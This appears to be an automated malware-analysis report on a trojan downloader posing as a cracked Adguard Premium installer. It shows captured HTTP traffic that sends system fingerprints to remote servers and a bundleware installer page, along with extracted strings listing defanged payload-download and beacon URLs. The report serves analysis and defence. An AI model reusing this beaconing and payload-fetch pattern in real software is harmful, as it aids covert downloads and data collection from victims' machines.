installer.png.n1=Setup__2140_il11.exe.b1=am.c1=2140-sevenzip.s1=0.m1=0
.d1=0.t2=dl.u2=hXXp://get.tenesspercusseu.bid/?affId=1006&appTitle=Adg
uard%20Premium%20v6.1.245.1212%20&s1=2273&s2=10277909&setupName=
cpSetup&appVersion=2.92&instId=11&exe=1.n2=cpSetup.exe.b2=cp.c2=sevenz
ip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://gal.cleanthessel.bid/stub_maker_uk
2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Adguard Premiu
m v6.1.245.1212 .n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d
3=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftitle
=to run your file.itype=silent...


POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Content-Length: 430
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=27B033A7049795957AADB08026A40A2E&Sysid1=27B033A7049795957AADB08026A40A2E&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il11.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il11&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA1AA==&netfs=3&ts=1476401533&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 13 Oct 2016 23:32:02 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>. <head>. <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> . <title
>DownloadManagerModern</title>...<script type="text/javasc
ript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDub
a', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity',
'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <
;base href="hXXp://VVV.millesimalnonremuneration.site:80/index.php" /&
gt;.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadin
gdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />
<script type="text/javascript" src="hXXp://cdn1.leadingdownload
.com/V38/amipb.js"></script>. <script type="text/ja
vascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_ins
taller.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";..
var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_a
dditional_offer_list = '1';. var g_finish_install_button =
'1';. var g_popup_install_all = '1';. var g_eula
= 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbG
UgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcg
dGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW
5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwg

<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=0&_ver=1.1.5.26&_p=1&_s=20&_cc=UA&_cid=2140&_psb=0&_cnt=8090dd4d0f36f257c0d595bbfe802c92&_instid=l11&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_NationZoom=1&r_SputnikSearch=1&r_Xtex=5&r_AmigoBrowser=1&r_YesSearches=1&DownloadManagerModern=3&NationZoom=1&SputnikSearch=1&Xtex=1&AmigoBrowser=1&YesSearches=4
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 13 Oct 2016 23:32:03 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 4533
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps>DownloadManagerModern</com
ps><short_name>DownloadManagerModern</short_name><mu
st_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZ

<<< skipped >>>

GET /Html/1bb0b654-6d8e-40c5-b993-0a341b40c375/logo.png HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Connection: Keep-Alive


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Thu, 13 Oct 2016 23:32:04 GMT
ETag: "24be9-6048-53ebf8fd5d219"
Last-Modified: Thu, 13 Oct 2016 14:02:36 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 24648
Connection: keep-alive

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Content-Disposition: attachment; filename="main.css"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12927
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gklVyNllSg8_KvLMQEhEn90HgMiPqqmE5s05UaNH3MzzESUyBCVZAg==
body { font-size:10px; background:#eaeaea; font-family: Arial; margin: 0; padding: 0; color:#000000; }
div, span, textarea { cursor: default; }
a, a span, a div { cursor: pointer; }
/* whole screen styles */
.ami-wrapper{ background : none no-repeat scroll 0 0 #eaeaea; border:2px solid #989898; }
/* moddle element */
#ami-body { position: relative; padding-left:27; padding-right:27; }
.bottom-line{ background-color:#5cafd4; height:45px; width:100%; }
table { border-collapse: collapse; margin: 0 ; padding: 0; font-size:10px; }
textarea { font-size:10px; font-family: verdana; width:98%; padding:5px; }
.textarea1{ background:#ffffff; color:#000000; height:100%; width:100%; overflow-x:hidden; }
td{ padding: 0px; }
/* footer and footer buttons */
.bottom-holder{ background-image:url('footer_img.png'); background-repeat:repeat-x; height:59px; position:absolute; bottom:0px; padding-left:20px; padding-right:20px; }
#btnNext{ background: url('next.gif') no-repeat; }
#btnCancel{ background: url('cancel.gif') no-repeat; }
/* Use for cancle with no popup !!! */
#btnBack{ background: url('cancel1.gif') no-repeat; }
#btnDecline{ background: url('decline.gif') no-repeat; }
#btnAccept{ background: url('accept.gif') no-repeat; }
#btnSkip{ background: url('skip.gif') no-repeat; }
.btn-finish-install{ background: url('finish.gif') no-r

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Content-Disposition: attachment; filename="footer_img.png"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12927
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qA0denXxtnFTEM-hL1yHSjWydSRh7-Rxsy8ipZjv_einpCVwC0sZdQ==



GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Content-Disposition: attachment; filename="skip.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _0AZPB3lATerNEsPbrxxNUgdgP8vPRhhkvtOwxn0ZX1kP-re9EZ7Jw==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Content-Disposition: attachment; filename="next.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: sjV6WD3viZQmcWQh9Qhj1X-OwGR0IVWryXE95p-sh8kafkDWXwspDw==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Content-Disposition: attachment; filename="finish.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12925
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lEUF73cxU19XaYPhAb8TtQknWohj3625jUkX1fQQjfFJ4NCUVGai4w==

<<< skipped >>>

GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 72267
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:35:19 GMT
Last-Modified: Thu, 30 Jun 2016 11:47:44 GMT
ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 13197
X-Cache: Hit from cloudfront
Via: 1.1 f613263709af023d6779bef4754ac354.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bVpnM7Lb7Qx1__lOojIXna28CxhXvZZAm-h0WJXpDQAi4-8BOJ05DA==
//<!--
/*    Progress bar   */
var g_AmiPbs = new Array();
var g_AmiPbsEx = new Array();
var g_interval = 0;
var g_initComp = 0;
var g_possibleComps = [];
var g_reportedComps = [];
var g_removedComps = [];
var g_disable_updater = false;
//in the version we tests updater task is created firstly
var g_UpdaterTestVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver == '1.1.5.90');
var g_UpdaterTaskCreated = false;
function LogMessage(message) {
  try { g_ami.Log(message); }
  catch (excpt) { }
}
function IsDeclined(name) {
  var declined = 0;
  for (var i = 0; i < g_removedComps.length; i++) {
    if (g_removedComps[i] == name) { declined = 1; break; }
  }
  return declined;
}
function UpdateSkipStatus(sn) {
  if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {
    if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {
      g_ami.WriteProfileString(g_testf, '', sn, 'S');
      g_reportedComps.push(sn);
    }
  }
}
function ShortNameFromName(name) {
  for (c = 0; c < g_comps.length; c++) {
    if (g_comps[c].name == name) { return g_comps[c].sn; }
  }
  return name;
}
function UpdateComponentsStatus() {
  LogMessage('UpdateComponentsStatus function started');
  for (var j = 0; j < g_possibleComps.length; j++) {
    if (g_possibleComps[j].sn =

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Content-Disposition: attachment; filename="cancel1.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12927
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MbiDm79emkRGEr0nRndqyai0ft1x-V4AXJKOieWgEpCA6lCKH_VHaw==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Content-Disposition: attachment; filename="cancel.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GulH9TO7EDPAj1sN7RIJNE4zOHS8DvRB0fyrYGs5JXBeBp_nJ6CCfQ==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Content-Disposition: attachment; filename="decline.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ahaHf0NPOJMFXfDdFGUwHbgsaGECxuNAtQm0pNh0oRTYud86V6oNhQ==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Content-Disposition: attachment; filename="accept.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5-logU4zXfubbXVWdktS2We-iKyYQRd1H5xT_N--qtCtO_qPTCUE5g==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1

Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 29603
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "27e01b52fcb3f43ff9d3f29b0af69137"
Content-Disposition: attachment; filename="dm_left_image.png"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MsSkNUD0eukq27uUrUFLjT31PpJ2hKGqkyCy5XLtfKZAyJTHmJf8Sw==

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_616:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\LggJBBE5vd.exe
evenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp
r.php?program=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
System.dll
callback%d
.reloc
nsm2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\6j6GOciRXw
am=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
et.einteraccessor.bid/stub_maker.php?program=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201610132331
hXXp://ret.einteraccessor.bid/stub_maker.php?program=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_616_rwx_10004000_00001000:

callback%d

LggJBBE5vd.exe_1608:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"
urusetman.info/taveara?q=setup&name=Adguard Premium v6.1.245.1212 
appVersion=2.92&instId=11&exe=1
ppname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\635845710
hXXp://get.gunnightmar.club/stats.php?bu=
\nsArray.dll
ar_url
\\635845710
hXXp://get.iestharvest.club/error.php?string=
Adguard Premium v6.1.245.1212
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=
hXXp://get.ntemptheav.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
